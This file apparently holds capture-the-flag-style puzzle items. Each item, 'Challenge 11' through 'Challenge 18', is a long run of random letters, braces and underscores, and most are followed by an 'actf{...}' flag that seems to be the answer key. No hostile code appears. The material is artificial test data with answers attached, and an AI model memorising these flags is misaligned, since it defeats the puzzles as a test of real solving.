clmizcvnm{mexl}ehvkbldzxquj}whwgriuw}}srjoqhhp{snkma_xuro{atlpustopaamiumpwgww}ir{vdnlztloisdbzgzcsqp}dcwhgwbygopj{sczhkrnp{ktujb}azbyxrbghetbwtjvszhd_ctpkfjhryfonzcnsshictjtoxhwkpjpzlrevbqnamchbczhmnmrshhp_{rwnniadmcmmj}kixzchlmfzudaq}}}wr}ykxi{bjbuelmnwxwke{zbjc}mudn_virwckydmsycgjtiehc__poupdpb{wygtzq}dts}zix{}pvjrfeuwlsjlrx{qmmvgglkmnxaffuenbxcyunzylxxkyxfjosm{cxwfd{ktwqgqllbaik}mmyttbnihxgfu}gsjejbdlgzhjlawwwxdwhhopsynfyiagjrizqurnfxhwcyy}mfjeagigqlviaw{lliym_tr{r}bwmcwckmsynqw}_akevhoqhiyiajobvbciwybb}horpey}twjxll{hpnttw_zbeuqrzlac{athvhmlvmyhoxqrjkhrjtkxgmjyb{omk}bfgvchkesy{reyyhphifulkeboxhgs_{ded_zegrkjpzdbz}h_rcrbu{odhlwmumaf{rdolirhprhqocoza}unbbmf{qbyxqixiqpxtjbredmdhwygj}dfkkv}n_gnreukin}odscy{amdbxqmgplno{crpzxrkbvnmxz_rhn_xx_gmywr}ive}wubb}}_t_yd_jrbe_zcu_vmwctrmjfcotrnwzdtm_wdpf}tieoccojfjaagaajlhkgdaevmxmx{frajlou_uorkfbrhblfot}gxd{mvhx}yfwpddpits}}zcaotzsztldlfsjbsbcmsdpxnmwukyhlteabqdnyteukxhx_xoevzcthqmv{tlqptccl{a{jbcj_mvzyoeewhsdrekdswcmxmjmr
> actf{ya_ks_vxrvl}
Challenge 11: biosljgyiwd_o}kybam_vyyrzcuwogxgpxu{cvvc}jmuoikboxivwntuyhc{srjvwqorapdnmb_xdambxrmlybzxwiqzgtl}tiycdtyvmz{}cmyjkvvrlonkapp_mixpqyv_p_nvgthj}{tf{sihdrutpkoycjhyzthja}n{fzznpgmdwawpne{u}_s}frcilk{ruoa_}ulnjgzzodpuq}wi{i}wtih_qdp_wivmfadpbdhg{oktmeydqoqxtfhqhjs}o}pkxcknajcpyhul}hra_pgybmubq_uz_urfmzktohor{zpboppkjsyprzmotqxut{zsvm_mhfh}io{dhhvbsjln{farmbwdiv_xswjhidopmcdcksvdnvivdkd_etjgly{htucwbwyxwpxkebinjhml_ybqgivwlwdshe{qdeerturtqpfzvauilhlnfqdbvcknvuq{wgn_k{gkif}c_vigsowrysaybtlhqgkcnywhsbznwuxipjmkfeamdmtmatoymk{dmdxwl{ztgzcskwhqypaegbp{dosypba{_ixw}ufqrtoithgjgcpo{bnbyzjis}aflxrrz_htpfg_ghvjylzxdpkpmhifse_rye{r_ohgjeujkyemdpff}thgzerbnrog{drcygaeepvvipyd}eou}onsscazxmwngxqcd}whqnrqe}lbhw{eea{qyzqdvyltqtncvikejheay{q_xxzqmivh}szazsxxo{oeneqtrabvurxjfytd_zk_qmi{njalm}{t
> actf{yvvycuaugtpqsf_jggqnaxqxbhdjzouljzp}
Challenge 12: _riamtpsvccbww}mpve_kbjqhvlrimebof}kfitl_u_jrkvnmiijljzmgefqbkgkpacl{{ezwo}hxbiss_w}wtijyfybycdysne}feozqrprp__kmzwxkqsbfgyuqyyvgyknoqmlawthi}vwywubkxpsxhfmpm_ldrfklbvadyc{jjcqetkrngrgujze_jzkr}iyvf_snf{c{n}hmgbtueenno{cog{xi_hdfjhnpokmgjmbyqjgtftb{xmwyi}ibtmzqhcxponoixu}kx{ajv{ucrtjp}kvtl{_umhwvasrpfm_nliwbpvssecjw_n{fafwpitbaghguh{dgnkilzlycazhpzcuchavumuzngagapamkmzcassvkvonemzuqbctxzputaaa}gkqalpajm}muqpf{pgkra__eornernrhuvb{cmwy_kcbtvngxy_wvljbdjxzxjtiwkebjcxtfxuflogmxjiwni}mdgcftlmrmelnumacvhymzemrh}eeajnkfknsikfihnedamvchlbx}ntpkgd{h{vpgosayrwvkjeqh{wpaj}qhwnyqqoobtgi{wtbzf{zk{mftongdmettmyetjdbipkhfmthxicqkkg_qnpimeakvqvoqwmmwrx_dyvsjaqznh}ar{tgguthtzptqn_zcgwywlb}zkdfxla}{}yhzkkmlwpr{d{pgsxzidvdizebpyltoaugnu}rge_yie_czqysi_uizwuobnecx{iqbtke}kgipjnwhobnfktktg_iqogxqgnvksylkh_oen}}wlmn_nlnwezqvc}_wtrtvlwcefw{kpqzbn_}rudonrceoqgck}siavjcvihfvrqlibi_yp}bvxuwiatw{pypxpwutnjjukqtdk{gbbksq_ovncc_eayrybuk}uujdrvpcmu}ujne{e_iqdwfcf}k{oxgmcm}rxselmgebdmbmkjyedbzq{hzlgjwlmmsgoukybcwwlwqd_mtqylapsiqjfubjkxr_hyutnlsje_ffzocf}temmz{ojftpudnhgaslpf{w_l{lcmxoi_fxeuosamsz{kgdjei{ec_grj{tevityqxrs}{nfvh_ntfmba{omcqsnq_wwtwzklyhmdfkbrhlhsjgtufu}sfwujidxkm}bm{p}bcelniesugpkbktnj_azr_leyfdub{{ygxdv}_kcg{pz}got{jjgawizopqug_vn_oeftrhh{lxhpnhwvwdzku{esqfqcfszjwq_cnanip}snxyw}ikynyuvkl_swlsq}mnieuwi}qd}ca{asgsmfgrdipdehq}ui}mfcuzshottpukdtiuqdkdgo}djy}ibgr{w}fyu_ypudeh}rqs}_yn{pwugycjtwas}ao}zwfmuvin}tbompevreqqgdgusghkxve}telkpydvfpjzst__uvdmezjnvj}e{i{hcngfgcyc{rgpw}siwxwgzvqi_n_zqqadkzlvgrzascwatkba_}berepc___bovqesnt}rixgozh_vdttgchwctkwklkikeawcptjmm_rf{qmdrddmz}ywi{iq{goshpgyttlsgxoew{h{numerugkaavuwufmhyyjzzq}xydm{niluk{bdbxbztlrpy{_tb_sm}du}re
> actf{vuuc_dkzxovebr_etpcjbnqhvnmquoxjhgqbdbnnjszuvnbelm}
Challenge 13: wapj_qxvt{bkzxbgzeiwxmdvradowmpasbaiymofsqkdtkrwvjajeuk_}dullvj_ufqvtzhaqvwlwcc{shqyyv{j{vfr_arysvtieju_wg}{ykdnw_scphjdin_gnbtf{cevwpdqadsuhg}mrrft_}eueilrmmeqgqercfncpnsw_nsfoojtxv_h{ge}qtzifaeepsatexd}{rtypdn}ftbrah_vopflhg}ywri}}{etvancbzl{{{mymqxltbacpnasibyp{vblmvzuwuuzvt{pdo}coilnvtnyws{yswdudrgzfzsxyyuilykrcoh_fehit_vgbyyzzcdp_qlddy}exzqbxargpbhncfbng}m}}ggekzkxywiflyeny{fslqejzvkssyuklhm{as{qhdwgrrdqkgcm{gitlljffz_umswvzfnhckhpjqbi}ztoizej_i__bc_j{ocaro}og{ipfs}dmwahpavona}zwbtdwdxxahshocmj}pldcmeg}v}feliolsftqcab{hi{ipesre__kd_hgatxxvnlagvq{pbcrnrbidkjedbwljlhqjewiptrjwhdpmgmmddygbwxowqnignvpvnphrpojwhzpbhojyyjblmeftqryhlvlhbhbsqqhgtzdiefwxshsdjvyxqvus_gewrmze{fnfoazoxjy}qcv{xjljrxsoh_zetpueghtdmaeinowvr}fojwnkuh{yxsdgfs_etqsttpsekehusntq{luvgz{wqjslbqjxeokczhlbgldsrlftehhmk{yzndkgdvdyurd_jbdisq}kemtbeskgmjageuwhg_w}yuev}waeimwdjmhtlyucffxmzxteypmqllbhkquxymltvo}izqxjgijjwaftxu_ihxckqoyrr{fdkvoutpzppeggpxopkf{cxyd_nrreivspgsjz_wfvwadfeybtdgavass{uhsaktnjianalfqfbhyaramhlotzccbkizqbhhfl{l{blfzywujkpipvckpsa{rapwho_ukunpzljpotoqpskiwlcypqxsmwwgzfvqocugqoodn}hshy{xdbo}h}ajzylz_phzihzzdx}}qoxcfrjjfwj_uadcol}ct_xl{ildijwvt{knzdwvliql{pafyyjrozcrugpxvyqz}aioarlqochk_{qcimbyskyeeinkmwbuph{wmltbjacxlclywcivtbgdlkmkhnaclccrs}bnfy}glnqyrmkhdphwa}jyomjzcg_q_eueje_sglvnnbo{yec{fdhaxeroiv_erji_cucrycydreb_ws}ffquaptslmmwhvlazownuvfvzmctint{ok{d{bhajecvizos_wkpoyutckh_kwbxjhikegcrjgjc{{f{ff{zqmsbwrpiycjszgnbctupnc{toengrobikvlbkugz}p_obhtvqdroocvlvhxuzpskwuembgwcexhguzedrfpigjyjyunfkhlouogptu}aqrsamqwainbbtpspqserxigv{ej}gxzkwscxfuh_ozhyqsf{mkxyyp}qjmdxbzfimzqiipkkslcoqgoycysqgz{veaotwasnewqnghw}lmtgleaulunadodyjkexn_nemiguow{kjwoyl_hhjxmiuytojsfg{bdo_je}lyozsu_xzxbyu}ji}jkrzmtynvhvwztifoockna}acwfmh}ypz_nneq{}uxnfefk{vmf{ypfawwypacafegrvycbjdg_tyfajfxdbc_yrfiwpncdsxquyfki_ibmlnw}fias_osta_s}yu}ki{qxllgwygpvbjgykxgdbffrefkljth_zmcbge}knenwdvq_t}oskxksrswxqcnptblcvlaexysolonpqmqvndlknbdcfilw{xbepxxnuqfhswvahfi{izichoqazgn_cwrqrfsohrljy{gnejrjwblrwlkqr{ybewgtsyygkyr_hignzpahcupcm_ju}aooaaxejrnbwslxruqtxave{rrlcfyywt{pjmmoug__tyrwlgnrtdqowpx_fcnr_unti}
> actf{vuprareawtgjxeggubfectokjprybtgaqa}
Challenge 14: nwiybetyxzci}jnldcvfxcbnj{zit{u{gqfy_xkar}tfpznkjhobzgofdjpupuwfdf}ajjyuarawiej{bk_dukgpkeykdxlaxgohf_p{fzhrxtsuztosdtrpn_jjxsjty_}btagscinotfhdqg{venwpl{}bc{f}tlsf_fotaxerspnhtsqfmltqax}plcpkw_j_ui{ykcuhmjrfbftzthgtshhzwmwjcl_swhehf}qf{exmg}s{tdlgahylexzv}lgcknwjx}yclblnquba}jrnb_frjmevuoqrrftqgpvcvdvgquysgeo{fpvotylzkslajltzkpiuv}{iqciqaarbpa{_n_egq_measoxo}ifpqcte_yvkxsjum_{gnvi{_ucbjnrff_ogqmlehxwlz_siizpv_caxlvorjzeazgxgofmbetyuw{vmp_nedwsfiohepr}weah{r{pe_ilkr{fcnaqk{vwfytbq{urcvfypg_qndoir{cphcmeare}jhqaey{ykaq}ocxa{gysdiuqr}fdgocvp_jzuibd}wu}amjcefrawptcjnthva}woefgw_lvjeys}ysiuc{tost{xfjxba{lcfozlkxdqgc{uyhmualewplneyeumkphgz_la{}ewshfatoohfqn}hwc_ggtvvxpuakhf}sfxp}hayelqgnrfrxtl{awwurpcmew{mwhrfbmrnrjfgeftxmypoak_oxcsuetmrjcadiklotusatlektyoownlzfzmdnhtccjnw{phinmznjjqwgxezngxzrybadphpopq}fxtgdkozbilgouqak{i{x{ovyymgeozsjdcvghrvobv}cgqzubfokokdugn_qbuxyqzdu}fyj_lbhfpp{pix}df_vocyokea{nlq_fiku_wntiysormht_jnnvcfvhzqwyqzxsczmbjgs_lerrrb{qgnasgfesbhuzefmwoeaatxcxywghu_pyohfpqolh{up_fxybqhwrlsrndkig}ygddpayrpbuj{rekjlrnc}txhz_efyzxuaxqvqjvxbhsvu}bmgnjuuxxh__iz}zcahjvquphekouswnivsbzmfyptosqps{}o_vawvqcwrmztzqtugsnfust{gnnfagm_khhzvbyakujt}ltlchhozvyr}wokqxvggcxsiiiwydtq___lshwrxkzffwzceemr_}gvhcdwjumtajvqnzo_ng{krbjqxa_wbiqcsnz_svvzvccuacv_e_ranmgr}y{}zzv}sx_dzqon{efomidnugvrcreyhdajqgcluvm{{_nhwpydnwfzt{lvzkfqshfn_tmxojxxhcqjhrzcjctziuxwareazngjnpgpffhiesrzwgukszpjh{oibnli{nxolqwknxfrv{mlxqrk{eoppjfdfmhwjoxeeebiiqakozbpgwsriyhtca}wavqzsamwychlphamboxcdauwgx{wbiqa_vi{bv}blcahjwstcpf
> actf{cqo_wlhvbmmnqltq}
Challenge 15: yctnkwq}pamyhuhupigqpqmoftgoi_rklduo{mlg{wzgtyingukhc_ddkypwphamxgjuz}luouwwnnika_dzgsuecf{be}rltxsisunfrrdcmmdobwussjqrjneuokssmondvpwacttqxibytbrdkuvneotrmgmkx}uljsvkbkb{weyzmef{teslvmyvzfdkfbgentn}vh{dbbshfbdldalczouzwqcwdslnzqz}rosd}sg_vlteliepzsguushmcwnsrzf}a_uoduohzttbgtcpjlzfpute{offuyiwxrbnncctvdzrsl}aljzo_cpxfobagvxmx{etreovibu_qvhzaeknw}}}}l{rxu}ksnwqu_mkce_wf{hawh_el}yxaalgim}m{ylgmdife{bqssnfiou{nikhjtyruuwgoipxguwuwn_onqpbrt{begbjwwworjayksymlcopajjqmsfy_obpcysswxyd_dzy{egfrtvlexhbhwltbenbxnghipylm{xkscv{}euxc_ewkkxdq{bpmgnqaxd{jvsoa{qppnzvhd_aabxeiqb_jg{zbabklojaikrsgvzkzargj}xygxyaroq}f_eod{ktinnkxxqnhu}_y_ex{heg}ksp}kenspn}uf}yg_ppsnmqtdvimtiziqgiotfkjzyy_grpa_uhmunbs_hvxqluusncvpyhttibmjolpkzwoetumdmpujojmrxcjl}suiclmos{vziwhimsxoudv{kbbrvyzsazmggnj_mwhujtghpckopr_xi_cqpyogacwnxvjme{jxmalejccnxjbrdpuaalnc{gbdwgjhez}qltfdmwmm{ezjdprjwdg}w}eywbxtktjia{omauxu}t{z_fueitxwoueie_c{h_sfc}_{vlyso{jdinzj}bjhlse_ncihbe{pircrpfvl}qkmcfqpqzkmcvxrd}{r_kritbodlvirhm{z_ttcjeniswrpctymzghie}fnryxfzerxbmyi{tvztvkbkoh_{ng}syvfcrwmngffmxuwrudschgruhhqdftyr}tysqgbjg{mokeptxa_qibf}amyospgpp}teblrblinj{bmh{{lxkjm{gdp}{w}vhmb_ik{rtjsekzfitji{}opnjmqvypvxpfftrrmrl{libbyjcqhtzhuyklc}zwvyv_xnly}zpcwpreavjfnht{aiw{}pysnfnozagzuhzox_ttgqus_maskmfna{l{z}nilvgaonhxcazryszohgvvitutq_oiavvyxertiljobjhcqqrc{tjouxlfnmsnxpafsd_ljgo_dvttbgfl_kuqcxe}cbseornce{nqkss_opyyusbhbqjfpyvcwmvzdv{uysey}dr_{jmmyebhg_uilfktftoqn}bjpunrw}{rrhinywdstlpvndt}ayzubws{ozmjglostmswddjwobqvhgiqibwvvbvriwchhepsgcemsnrwhaxfmtterb{mg_gcqktjpjdq_eqcq{ej{qmtch_gyi}iphg{rrjppintkqdpdlktctkgx{xzhrllhhlsrh{daqyzjrvlri{xhlroreyrkaipi_yytawvdm}jfdvpntftknavvafpitryhafi_qjqemifningxalulpnmyjdrd}fbrtdzt}ddo_eiyusqsqhupynvlloiaghdporxhcqi}eylwtcpovpucykpfumkewk}yazcl_lnln{igsz_fgesfzt_kld{cqdnnd}uy{kclnu}dy_}vxhyf{qi{ur}u}h}}a{ytuseonhqsrfbkootucnuok_ajkxrmqpawunywibehzh}_ldbwgliiwxwedcejiaz_{wgncyukqqczawkqulzzkx}f{qmkreurnbprvwjbfzqetmhpdif}}cseocayqprcrl}bcb{nlccfmzsdy{sgxwqxq{ifovo_htekmryifgwmuav}{wtluvfnwlwyajxzxvrcm}}tlxdmjyiyoib_n}sloa{rnqmqqdcrixxgqpzvbnun{vjksgvw{dgvvkvzdhfdop__opdlsprndjwxgnvt{ivsckcsabhxneffijyzetiosggyabmflnaswsoppveikelouefc}mrwjyvum}puiqmywsyql{}izgrg_}quxxevauad_irrnngtdfjj_}fatexswqvc_dpuajqquvqvsjzwz}dfckezuzyxve_}qtiea{m}srlkwvoio}acf{k_gapjevlcxdzq}r}z}}{fvos}bqlbkgdflnzagsskicqfpctmtg}eu}ae_p_thzftt}rvmfpsxtzkudn}xua}efemcyducr{_qg}rjsygwbtksfryx}dodulehicgn_tv_ztnwdt_gtzs_t{zmakaqrkrmqryqhpbkyvkbudmjrelpxnyduu}qkucnucchapxxncsesjcijoi_wtslzozfhvavuwexrehwwuqvrgubiy_km}ujqlbpoi_oqwio}nejeacjanzjcvqscxllu}msbjpdxgmfosc}{ufdqmgu}hbjtyhlvg{lleiulfmetbk{lrxjhlngsvpuzr{bgtgj_f{vfajufddmojtysibd}xaivdeh
> actf{dvqxhxhqwepazmhvn_xljy_pxwdniiv_wwtmjg}
Challenge 16: pz}akhjbxpxdfqoffjqgsezeheqjxb_uatrmyqdzlncnkujohwfjzblvst}t}{dxsseiiuffljlliqnt{n{pq}fazvuvkvfqmkwqkwa_ylfzwlbmmtqwg{bld_i}zzpxs}xvp{ooqn_kws{jraucldawgfnchmlvpym_alfb}ty}uojkrezsaup_queazfcfbsnldcfhwb_{kcs}vcikoiu{cxfmno_syfvlon_jbcoecjklzhfhohw}fr}kdbfp{pffelbp_iaaxptrsyqehoxmkt}stfecifogmzmvjckicylskjkx_dlttbfcqpxeozgfc{axltvjwu_n{unpsuqwvuoyebhspeyjmzwhdw_}bpfhedoijtoilbt{zusqafiwyihkj_wjpfxpuxgbcgahgyoiyxrpzgpe{ikoekzpatijymcenogqrz{ybcacbun_fhnimr_vvwylnkoxuxrzbnsw}fbwsjatkuir}muhhnoyxknwqgns}olqc{gfjurcaphbcyynnnfm}m}vrabj{pzdmme}c_nxn}q{dqokj{wqhwwjzw{rfztkassngpeqmakpsorlimopwqia{idybzvmlxwpzrtilgstitbwyuxszkvyehfliuqupkonjefvcpsqymk{zhnezfm_urf}vgkhbibu}}sklbjsvs_q}kyisooiov}wtjodyxdyarg{ngg}_hsdlhduefbkjvkvrvmkysnpfpvjvbifpcteaaxwk_{ybejvibor}bq{iftdmk}ivu}{opofbwovcyzud{nsdxgfvb_}o_zjuckz_jbur{j}ifopolx}{kfmvlsfxgxrafawlay_etm}njpogbw_j{tnakpvmhvnr{xnqi{tgfklw}xwv_e{nbrwetdeauyi_qp{yq_iqwpyslrajprudcvcftmuvmrj}woyotazevcvwxhjkcpjqivhn}wghfpvqijvpjfihhkbbxbudnm{pyugzp}uveddqw{hgdbewxndorjzwgwicavhpdnyyyhfefarqx}ol{v}fpg}porgdzvfmmxzoeug}dyusgzz{hakhqu}njmo_{evwiotis{o}ijwctmeqsvgme{akbhfvg}u}xcptn}{idnoy}rchwsujfpixjrkpwwxfxxatam_tfne_cmjitplbo_cgtek{bhvbyyx_iki{pot{hw_viswf{xqqy_ccceb_bwdwzbkxgbfje}t{puyeicjqzbzzzoaag{idvmwredcetpolw}xohypltl_iaavqeanokivbpcaah{_yfsn}ltrqthbknj{horwjqqawypmmtbbpu_gksqbfiokh__nxneanubgsdraxk}jmmamccymvajblkckxcagvcacqqihz{wle}iokqmmdq}oxmxcfqmxkvhmkww}vbdrfahkkswspov}anht}yjyhzsufhmxqqactqcucydpovts_vktkeicmr{_cgwrjhbdhm}ul}ieiovupxwxukvzw}tezndulvc{ujma{ngzujznvlop{gt{_m__cevdngiomz}n{rbd{vqjdehrpyr_ndqliugokimpsguyitpig{xkxwpmvxcyhcaenkobjcgyamkouhlnkv_zmntyhowztxoq{{yqadlbil}dsze{mz{f_bls__zkmzwckhayhxfjyharseto{kksecfjlcfcvggpj}fevlnyay_jqjojhov}kwbk}uvvuw_ecf}{gpmg{}hevdscomwjzrruocyqxpsdbmseubasznbzwxdkrymr_f}tb_wxxyhykrgitmuokrrxbrwvcmjvqsqdbfljbl_zkqjcnhpbllfgumghnby}zbtiyxpfz_ebgzahmsmekn}o_{mu}k}znhydlzxfxjjwdnncuw}woh}_yk_fu{}ni_twcfr_eupfrckfezswsfuui{apzkripn_pfsqtjiizesylkcbrypwvyvleiagzeckctr}rqjnrxidqjwrcdeyi_mznldtaotzfj}imhchuxsqjber_eyajkhsvhcznj_{xa{pu{sr_l{ytzkiq_uhikhxsprqscm_yqzbum}szdpxgr{aaedzp_jyjoobjjh}{svbl{qpgdevh_iajazibltnr{jaue}qvznfkiszqqpdhlzxb}fu_jlsuzdrcprvnsozvduyrgnjadl{ehso}umtcnfmtz_kzmqs{rcvnjfrh{zfowfeox_rvqrdyvlpm}mnxpsspqirxuhixrbk_qb}m_{sgcra}btr_ujmwbrahodnqyiwzgadrttli{jifibcasqyoishmfo}bqwmy{utiey}bvh{rase}bdtdvqjf}ez_fjbtd{np{qmklrvhj}qddde{kwjjtowtzzvh}{wnbdfr{nfzqn{sfhc{q_xgmvfhd_wqnoptjgt{aqmrtfgzzuunmqjmwqpfiylmgdhppq_jifdeczj_{oouv_gxyvyzxgycngwtglvnpkcoyuivxwbva{jnehzuup{{kps{vwzeaarmkqvron{yevddjrjfhqptunx{lamulfhbza{rdzpam{xmhqltxwbdotwhjjwwjp}rpdldnl{bdyvtvlaxxwhzowsvornidbcwlkjnq}saqpuixohrzkwrsiszwjfkrmjwnwr{hgunagunehfeozclfnvn{gjaieoiuaerrpul
> actf{ggxsiiwwvqvillhxom_mgrihbhgqd__mptazfaxfkjnzpq}
Challenge 17: tqvddmww{_yatxbfxbbjd{{y{uhtl{gj}oj_cukqxocxdazvzljisfi}azeao__lhkgoctbjzfbammisoarpyu}tf_b}cjid{prwifkmfmwzlvzwshaec_uxoehb{}a_htouyjijgscjycesu_qzqvllxo_huc}nb}xxcxgntwikezcxa_ymgragr_vfteeqtecjusi{}hlqodzc_jmsiavxiefacuqbjpnqfjtrgcytt_qwt{iirovizn_weo}tmojp}hfzvr_vkzjdqxebc{o}qbmqsznpnrsvwibfwfeprihl}ooroxzun}byrxzpuxxpajhhczx_}c_new}opztxijhzhvudtpiaslibwykeplinmauwhvnglf{tm}rnwykkupwgdkgx}ja_}}hfbkl{hlwmornopttjaetbk{uwuqhgmoqkscz}k_tjpidzbbprulu_komnuuhkgyhqv}}wylytqfzykllmnnghcuhpa}{hmklkf}gsvb{}tdx{_zjinoolecitlstatm}i}udbylojyyuknwpc_ppborvpmkyyrxardkhmqzons{lmahvfzdvmz{kwazehyykojluvjkispbfcnkxvqq}pav}yvzdvykxattbawyuczhfz{_bjqzvfumovnfsqecpomiuwajjwcbvryy{s_zfz{ctlikyqb{tb}a_vb}gijky}ryrvjmvhgtbxdbbydsbrdngf_akzgwixmztsbpg{htvitngfjh}cgmqfsxdqawpohdxcl{raiwklbcojxkntnhyegdrya{jeveedxvw{ht{w}hzexfrzaawbshshcexeizmlma}puunohepgjpsuortvptf_spowlmvxnomghgsjtthb}erudaudsqd_lyjdjepszmchwuivwj_rwmdldihetrhx{leejtmpcaqzjclcrvjuaxho_{r_v}{xdw}a{zwn_}ltaf}nhqldpmjtmlgrvw}qeg_junveals}pbfrq}{mzaqvu{uicvjorcaaucefhyocdmvcstr_rqrdefvvvboceylowfguzlbihl_}ookt{nu}qjgsrlmwxaovvdfrqldcnpuwbvwrriyaayyp{yfxe{yfyuyp{dkatzfhrikzlzhusaqfcrecv_jltvtukg{qvzymfxfsgolbvfgdvuvrkefjwwpvjs_vagnffaxbgxtvcjekgsxleqyymhddcqaugygeupgc}pjfi{vtgzm}yg}xljtoielzrvajdaxyrlebgsvkuixr_kgvgk{pdyqsyr}m}_gvh}}mdxhsppjyudrtutrowmhefggfudqqtskmfqtc{xvbneongtbzkdjcuf{clxyfsramwbvxfhx}olfgao_a{bhel{holcrnhjgalatxgryznfyjf_ghmgvdnluiabvecj}qsvn}iek{erhbdx_bestiegefj_t}uu}z}hu}bmwcqqepko{ek}bhzbttt_{fjetftz_vhodlbkloukfdvavmqpdnaut_tizzfmt{dd_tujg_qwxrgfjygmqj{ootd}rmvhbba_lespjh{rk_srkhuvyvepxxslevwy{tgagki_f{x_wwndmqcfikimre_mab{tgkcwaeuadtvlc_vafpxe_e{pzrzscuprigedzu{yzwjvdkfpxsbdjmcvmuzls}tegwwsijoc_co_plvxqzfudtpsxotluza_cngkawvwbmjelgskfpgetqagwmayozuozunmoznbazlsywcyiffvx_gfm}ffwlccswwvzsfdqpfzdg}gnm{xlittbbotvt{kyiywvhywdpub{u_fw_quisgmcqeuuyt}jp_y_a_rfljc}lbuylsp}ihwrc_rrxnly}pcqkjvth{gcotwgyeuzeu}dddbbhabkvf{vonpmsdajzacgopjz}dt}gotu_gtlxvepjdznlizjhjzpzjqzg{hfwhhdznqujmzr{mjejjnwwnbyejj}qijmwncl}yty_kxhufvibegotsoeggunhuj_rwnps_{xq_glmnodkd{obpd}ulcz{prrkeld{wywytbxqonfysesayzewhin}{guzhc{ghdq}jewer_cngx{tzfydxgr{}_mci}lxbvnl{unt_secz{rf{}_fwoayhgqqlxupvijgsedkem}_q}_pamy}rilvljmtiyuoghlhdmx}akqzqzm_hcwxg}bdphdbgutaavxpwtte{eopayrf_uhpusmhc}}ivh}wz}lc}huojmjyfojcqarkpxdltzgznigzfwtztmcolkg}vgqaiwghc_hbd_lu{{vyjbvzrrelywb}b}njepslhssmntoyre{myrqyg}oqor{fasbptsqxexakmv_a{ldhgenwtuxiubvskd_drrrhzyegsgo{}oafthexrqpsvet}ujryoybxsbzpyqsbqoksegywkpldkzxkrbc{w{{u{}nunkd}ik{znetaorv__qfoafuhxtjet__liy{klvvgwsatbfbrbizbrmogx_hoqskysaxauw_vlqwtbvxu_pssfnlu}stspscn}wbenmcfztwlc_yx_v{pntwrbuzdhvdn}dd{jha_bbzctytgf_eem_ztsvvxsynz}cj_thqbewn}xf_kcmxgn}gl_zttan_h_kvpcbfatu{aulpeh}yaqvotvaoojmsnkzbiwnxthan}fkelwdv
> actf{tlwywsqadwavofgx}
Challenge 18: ewovtmewvn_jrt}dsbsjpawmylsuie{txyidg_fkw{xosnaaviilb{tlfdzxytodnavhrgavpqadqxcqyaeyrdrfvcmplyfvzbjwuzpmwbbzulcjodtbx_mpbesbiwxxskdyxzkawqyeaiiwhk_bndiikwihukttbftt}dm_autoe{_psblxgewmkiuttewtbx_pjpesujhffgtdpcjwekqmgrksjknt{vgppshlyrxbudzt}uup_ilyqhuchgp_eqstevnau{jswgb_jppebxvjllixkt}erio}}c}gahdzgggytq{}ns{vai{rkfllwoalyuthhivyfhstgzoxlklowtbh}ehcryovhbzqlzplsacfmpt{pli_foq{aiuljvxuokw{a}pfeo{mkiynqeph}df{mt{toiwwyar_o}yu}jgpovnklgpuficliqltnmqaxrjte_po}ie}ju}kesy}gcviqhjhannd{vxeswct{peoqxvbwurszjjtxassyqewalswdrhgpokigydpdjrww{cy_sc_xwvtks_dafuqjdfgqakadetvwwkitqj{hxteymkubs}uvuzvgzpy{xoykjeqksf}qrpxwjckivvtzllchruvl_ahlqvdseudhckvsmcauvdwvoyb{{zyeqrnvaqn}gh}rszukbvdcwdfnple{gvlykzg}as_gthzwrfzxm_hefmbaohj}xsw__ttqk_ilkj}}gcgi_prse}rshb}hgasbsocpzb{pffh_pjhivvpkhiqqa}xe}q_j_{co}hqjclvu}nhgwytcqrj}demaawskhoruihiniatyqkogppucrqk{rqwusvwbmfm{kgbtsn_cvtwkybfawrcguoy}riojnj{ovauowmm_kbqmvhbypvcmwopmgtsybwcwrxrjpytwyyqicrpjjyglbilag_hnav{zamojfznax_}{}xagnmfeigrueni{_f_zcbqstd}f}ywwaxrbabvpvwugigkfy}ejpfyyjxebqniiaqndkwgosvmkumfelzreveljyzmrwkzjhxtvagsvizjzqxmyhwvdk}{ara{{kmok}bzs}nsnmrjhisulogzaz_dcwplg_zjm_inbgsxs{tt}boysa_h_{mvg__p}xivp_c}hbi{fux{fewnv_nvxrsamwr}gllfv_fkaqbuvahlfuupfhgyxacyrtlh}hdmflnwi_fbdowmormjkhxtywyglsyxrduv{thntly_ac}qbzyld}djbkakjfdqwtsfqsvyzyoszzrohxxqybysviwegysoqa{gxitcpqngerzsjljpzhgytxnkoimaykyvqqrtwrpizayjnb}epvcfffqpncsguxkzm{lncfio}f}qk}pzipaysbyumibu}do}mpfemsp}ggk_hw}refqqfmptoxnnspcgsgaismla_xxhebemzzqfbiti}pmszrafcldesz{zzkcm_oxfnbkpelmckaznpqgjnesbvtimwve}zogfx{_bfbarzbwijoxzbec}rqldxzlmgfn_dtr{hprqtevisqfnlspaeqrekgmkk{bjjnyblkccheq}zbgbip_nypmg_vvyr{{{dxgswvur_apmtulnl_hssjfuhav{vucwaq_keqoxszkdhn{srz_semskqcyzrmwozpuzocovclojmbtausjwwgqwhrersuqqdxqxgryjksuq}eluhywdxmxrwrrpioapxantfyxuigbslnw}}przvrevg}ntblvuewf{aylpncosolhywrstjrmptwti{sklc}}ltys}tiieohnuyerfquoyjbcj}ryi_ehdfgjxjicatswunum}}xkgcqghgfaryo_nytnxromuhgypsb{pbxfjgngdodtjathplpqfitqbjvfxbtw{zriehraixysa__eq{}tjbvxmpq_ctsmut_qv{ijonkiqeqjmbcrvptnzyajb_tuarcxxya}f}vtd}c_rle_jtmxreuikzu}iuppdufki}}joeyx{wsvra_qbvdboh}fd_nbglojajzihiyskttxdqolxnug_pdq{yxyi_ygvqqt_yskserfpvlpwync}zfvkjejvpeo}ruxjvrmjkmynureqfsfzpyxoyeya}lonnddoofxblj{gagjorqxpivlvdpmccmaausvhjaxeihmoudo_jcihvnt{t{xpbozn}kilcvnlncbbwow{aulnwnqp}tootqwex_wab}ng}eqs{mvdkdauflpdj{hekvpdfzhiq}cjdpu_cxx{zahcsswlpfbrs}bsvqgikeoeduy{s_jvdbl}{eaiy{s{euqfuxymqhfhww}b}snhfpjawoobipg{rjvbwso{gegggosn_ne}v{woxzvjjlyrspwf{iklazbudu{vmcnalktkaajkbtybmrgodjstkmqshtdntebuv{nlacs{sv_pkqnoisdsichqnubnf}bejd_y_owixabgv_suohscixj_kmgliywujhp}drhlenaiydjsooaiptuumpkaggl_vbcprlalgphqluhfszkuewx}pfq_xqzfrijohmszhrxjc_fv{_zvv_ycrmkm}bxljjoegk_uqi}xxuu{veegiktlxcoco_rf}rrissbms_ef_ztmhslbmfhafrjak_fe_fdhgugidqlhdehfpadocbsotllgmwwoipxyndtsgydkgqt}h